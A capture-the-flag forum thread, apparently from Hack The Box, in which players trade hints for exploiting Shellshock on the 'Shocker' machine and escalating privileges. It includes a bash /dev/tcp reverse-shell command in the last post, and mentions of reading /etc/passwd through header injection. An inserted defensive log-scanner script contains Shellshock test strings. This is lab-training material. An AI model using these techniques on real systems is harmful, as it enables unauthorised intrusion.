Shocker

Got it! Thanks a lot.

Unable to find the entry point. Can anyone help to reach the entry point? Tried all possible dir enum tools but no luck.

Don’t focus so much on the tool as the extension you are searching for :wink:

I almost tried all the wordlists looking for the “ext” in “ext-bin”, but dirb common.txt and big.txt seem to show nothing… Any hints please?

@psyberlupus said:
I almost tried all the wordlists looking for the “ext” in “ext-bin”, but dirb common.txt and big.txt seem to show nothing… Any hints please?

So maybe the “ext” that you are thinking is the correct “ext” is, in fact, not the correct “ext”? What if it’s some other “ext” that’s frequently used in an environment such as this?

Happy Hacking. :slight_smile:

Thanks, I looked into other extensions, and got there eventually. :slight_smile:

@likwidsec said:

@psyberlupus said:
I almost tried all the wordlists looking for the “ext” in “ext-bin”, but dirb common.txt and big.txt seem to show nothing… Any hints please?

So maybe the “ext” that you are thinking is the correct “ext” is, in fact, not the correct “ext”? What if it’s some other “ext” that’s frequently used in an environment such as this?

Happy Hacking. :slight_smile:

I don’t seem to understand this hint… any other?

Hey guys… Please, any hint to get priv on this machine… I’m going fucking crazy!!! 5 days on this hard mission.

@raphaelmota said:
Hey guys… Please, any hint to get priv on this machine… I’m going fucking crazy!!! 5 days on this hard mission.

Just use basic enumeration of Linux… or run the LinEnum.sh script… you’ll find a way to root…

This is driving me mad too. So far I’ve been searching loads of extensions and folders. I think I’m getting somewhere with a shell file I found, but I do not know what to do with it. I have run a script that sees this as a possible weakness but fails when trying to shock it? Please guys, any pointers? It feels like I have tried everything!

@elvskerm said:
This is driving me mad too. So far I’ve been searching loads of extensions and folders. I think I’m getting somewhere with a shell file I found, but I do not know what to do with it. I have run a script that sees this as a possible weakness but fails when trying to shock it? Please guys, any pointers? It feels like I have tried everything!

There is a tool that resembles the name of the box that proves to be very useful for this.

Thanks… I will try and explain whereabouts I am now. I believe I am looking in the right directory, probably looking at the right file as my entry point. I’ve tried shocking with a tool and it finds an exploit but fails. I have also been following some info in researching; I managed to send some remote code by changing a header. I managed to pull a list of user accounts and their directories (not sure what to do with this info) - I uncovered a new user account. Am I on the right path or way off? What now - brute force the found user account? I seem to be going around in circles! Thanks guys!

So far, having modified a header, I can curl /etc/passwd and also /etc/group. Every time I try to curl shadow it doesn’t return anything?
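The posts above describe the header-borne bash function-definition trick (Shellshock) reaching a CGI handler. As an added example, not code from any poster in this thread, here is the check a defender would run over Apache combined-format access logs to spot that pattern, rating hits against CGI paths higher than the same pattern sprayed at static pages. The log lines are constructed for the example; the field layout assumes Apache's standard "combined" LogFormat.

```python
"""Flag Shellshock-style payloads in Apache combined-format access logs.

Added example for this thread, not code from any poster. The log lines
below are constructed. The detector looks for the bash exported-function
prefix "() {" in the request line, Referer and User-Agent, which are the
values a CGI handler copies into the environment before bash sees them.
"""
import re
from typing import Dict, List, Optional

# Apache "combined" LogFormat:
# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Shellshock marker: a function definition "() { ... }" followed by a
# command separator. Whitespace is optional so spacing variants still match.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")

# Requests for CGI handlers (or script-looking files) are where the injected
# environment actually reaches bash; hits elsewhere are scanner noise.
CGI_PATH_RE = re.compile(r"/cgi-bin/|\.(?:sh|cgi|pl)(?:\?|$| )")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into named fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[str]:
    """Return 'high' (payload aimed at a CGI path), 'medium' (payload elsewhere) or None."""
    tainted = [f for f in ("agent", "referer", "request") if SHELLSHOCK_RE.search(entry[f])]
    if not tainted:
        return None
    return "high" if CGI_PATH_RE.search(entry["request"]) else "medium"


def scan(lines: List[str]) -> List[Dict[str, str]]:
    """Run the classifier over raw log lines and collect the findings."""
    findings = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue  # not combined format; skip rather than guess
        severity = classify(entry)
        if severity:
            findings.append({"host": entry["host"], "request": entry["request"], "severity": severity})
    return findings


# Constructed sample log: normal traffic, a directory brute-force hit, a
# Shellshock probe at a CGI script, and the same probe at the document root.
SAMPLE_LOG = [
    '10.10.14.1 - - [01/Jan/2020:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.1 - - [01/Jan/2020:12:00:05 +0000] "GET /cgi-bin/ HTTP/1.1" 403 299 "-" "gobuster/3.0"',
    '10.10.14.1 - - [01/Jan/2020:12:00:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo constructed-test"',
    '10.10.14.1 - - [01/Jan/2020:12:00:12 +0000] "GET / HTTP/1.1" 200 137 "() { :; }; echo constructed-test" "curl/7.64"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['host']} {f['request']}")
```

Run it as a script to print the two flagged entries; in practice you would feed it the access log and alert on "high" findings, since a 200 on a CGI path with that header means the handler most likely executed the payload.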

You won’t need to retrieve the shadow file; access to something else will be more valuable.

I have found some valid shells. Not sure what use they are, if any, and how I would use these valid shells. Also wondering if I should use one of the found passwords and try brute-forcing the password with username for SSH or FTP?

Ok, so I am pretty sure I need to meterpreter into this box. However, I am having great difficulty doing so. I’ve managed a connection that lasted seconds and then disappeared. Anyone have any decent links or info on where I can read up on how Meterpreter works and how to set it up? Thank you.

No, you can own this box (user + root) completely without Meterpreter.

■■■ lol, thanks for the timesaver!!! Back to it I go!

I’m new to HTB (virgin - signed up a couple of days ago). Have some experience in this field, expertise maybe not! So I decided today to give a machine a go and my first victim was Shocker. Gotta say, big clue in the name! So without giving anything away there are two steps: getting a shell (name part) and gaining privilege.
What I would say for step 1 is try all the tools, not just the ones you are used to. If you know what the exploit is then you’ll know you’re looking for something. Pretty obvious you’ll be using dirb, gobuster, wfuzz, ZAP etc., so be smart as some scans can take a very long time; know where you are looking for that thing. If you don’t, then you’re not ready for this box; go off to pentestlabs and learn stuff. For some random reason I tried using gobuster with two wordlists (that should have worked) but it found nothing. Just for laughs I tried dirbuster and ■■■, it found it in about 10 mins!
Once you have found that thing, do your thing!
Priv esc is not difficult; if you are using a suggester tool then you should find your vector, and it’s simple from there.
Seen lots of posts, so final comment. No need to use Metasploit; if you know the attack and you find the thing then that’s all you need, well, with the knowledge easily obtained from pentestlabs. Must also say IppSec is a legend; how the heck did they do it so quick!

So, I have a problem. I have the exploitable file and have used it to obtain the user.txt, but I don’t know why the reverse shell is not connecting. I’ve tried multiple ports and nothing. I’m using a Mac; I know it should work.
I’m listening with nc -l 8888 and tried /bin/bash -i >& /dev/tcp/10.10… with no luck.
Any hint?

Edit: I wrote my IP wrong… Now I have the shell…